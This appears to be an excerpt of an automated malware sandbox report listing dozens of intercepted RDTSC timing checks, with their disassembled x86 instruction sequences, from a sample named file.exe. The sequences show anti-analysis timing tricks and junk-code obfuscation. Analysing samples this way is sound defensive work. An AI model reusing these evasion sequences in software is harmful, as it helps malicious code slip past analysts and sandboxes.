                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4827 second address: EE483C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30D3D450h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB64E second address: EEB653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB653 second address: EEB6BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FAB30D3D454h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAB30D3D448h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FAB30D3D448h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov di, si 0x00000047 push 00000000h 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB6BF second address: EEB6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB6C7 second address: EEB6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAB30D3D44Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8878 second address: EE8880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE7605 second address: EE760A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEA858 second address: EEA8F8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAB30C06328h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, eax 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov ebx, dword ptr [ebp+122D2BDBh] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov edi, dword ptr [ebp+122D2E65h] 0x00000043 mov eax, dword ptr [ebp+122D00B1h] 0x00000049 mov bl, cl 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007FAB30C06328h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 jl 00007FAB30C06326h 0x0000006d movzx ebx, di 0x00000070 nop 0x00000071 jnl 00007FAB30C0632Eh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007FAB30C0632Ah 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB882 second address: EEB887 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC6A1 second address: EEC6EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jnl 00007FAB30C0632Ch 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FAB30C06328h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D307Bh], edi 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 jbe 00007FAB30C06328h 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEA8F8 second address: EEA8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB887 second address: EEB8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov edi, dword ptr [ebp+122D2E60h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f adc ebx, 6598527Dh 0x00000025 mov eax, dword ptr [ebp+122D0D25h] 0x0000002b movzx edi, dx 0x0000002e jmp 00007FAB30C06333h 0x00000033 push FFFFFFFFh 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FAB30C06328h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f xor dword ptr [ebp+122D23E2h], ecx 0x00000055 mov edi, ebx 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push esi 0x0000005d pop esi 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB8FB second address: EEB8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB8FF second address: EEB905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC891 second address: EEC896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC896 second address: EEC89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED924 second address: EED92F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAB30D3D446h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEE826 second address: EEE82B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEE82B second address: EEE831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9E7FE second address: E9E808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8438 second address: EF8447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F8D4 second address: E8F923 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FAB30C06343h 0x00000010 jng 00007FAB30C06326h 0x00000016 jmp 00007FAB30C06337h 0x0000001b ja 00007FAB30C0633Dh 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F923 second address: E8F943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAB30D3D446h 0x0000000a jne 00007FAB30D3D446h 0x00000010 popad 0x00000011 popad 0x00000012 jl 00007FAB30D3D454h 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007FAB30D3D446h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7B96 second address: EF7BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7CEF second address: EF7CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7FE8 second address: EF8023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06338h 0x00000007 jmp 00007FAB30C06338h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8023 second address: EF8042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D450h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jnl 00007FAB30D3D446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC124 second address: EFC14B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FAB30C06326h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC14B second address: EFC17D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FAB30D3D457h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC17D second address: EFC185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC185 second address: EFC18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F024EB second address: F02502 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FAB30C0632Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02502 second address: F0250A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0250A second address: F02512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01797 second address: F0179B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0179B second address: F017AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F017AD second address: F017C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAB30D3D44Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F017C0 second address: F017EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06331h 0x00000007 pushad 0x00000008 jmp 00007FAB30C06333h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01A50 second address: F01A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01A56 second address: F01A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FAB30C06340h 0x0000000f jmp 00007FAB30C0632Ch 0x00000014 jmp 00007FAB30C0632Eh 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01BFF second address: F01C0C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01D84 second address: F01D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAB30C0632Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01D9E second address: F01DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAB30D3D446h 0x0000000a jmp 00007FAB30D3D44Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01DB2 second address: F01DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FAB30C06326h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03ADB second address: F03AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03AE0 second address: F03B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06330h 0x00000007 jne 00007FAB30C06328h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007FAB30C06348h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03B06 second address: F03B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03B0A second address: F03B1E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAB30C06326h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FAB30C06326h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F095BC second address: F095C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F082F0 second address: F08325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FAB30C06326h 0x00000009 jmp 00007FAB30C06334h 0x0000000e jmp 00007FAB30C06336h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08325 second address: F08338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FAB30D3D452h 0x0000000b ja 00007FAB30D3D446h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0847D second address: F0849D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAB30C06335h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0849D second address: F084A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F084A1 second address: F084AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F084AA second address: F084B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08609 second address: F0860F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0860F second address: F08613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08613 second address: F08661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06338h 0x00000007 jmp 00007FAB30C0632Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FAB30C06338h 0x00000014 jmp 00007FAB30C0632Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08661 second address: F0867B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAB30D3D450h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0867B second address: F08681 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F089DE second address: F089E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F089E4 second address: F089E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F089E9 second address: F089EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08B41 second address: F08B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08C95 second address: F08CB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FAB30D3D459h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08CB8 second address: F08CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FAB30C06334h 0x00000010 ja 00007FAB30C06326h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAB30C06331h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08CF7 second address: F08D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D459h 0x00000007 jmp 00007FAB30D3D44Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08D22 second address: F08D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08E75 second address: F08E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08E7D second address: F08E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAB30C06326h 0x0000000a popad 0x0000000b push esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0900E second address: F09012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09012 second address: F09018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09018 second address: F09028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FAB30D3D446h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09028 second address: F0902F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0902F second address: F0903F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D44Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0945D second address: F09462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F106D8 second address: F106DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F106DE second address: F106E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FAB30C06326h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F106E9 second address: F10711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAB30D3D451h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FAB30D3D44Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F10711 second address: F10720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F158D2 second address: F158D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDB61F second address: EBDE78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30C06335h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 add edi, dword ptr [ebp+122D2CABh] 0x00000016 call dword ptr [ebp+122D2DA3h] 0x0000001c pushad 0x0000001d pushad 0x0000001e jng 00007FAB30C06326h 0x00000024 jg 00007FAB30C06326h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e pop esi 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBCDD second address: EDBCE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBFE4 second address: EDBFF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FAB30C0632Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBFF2 second address: EDC006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FAB30D3D44Ch 0x0000000e rdtsc
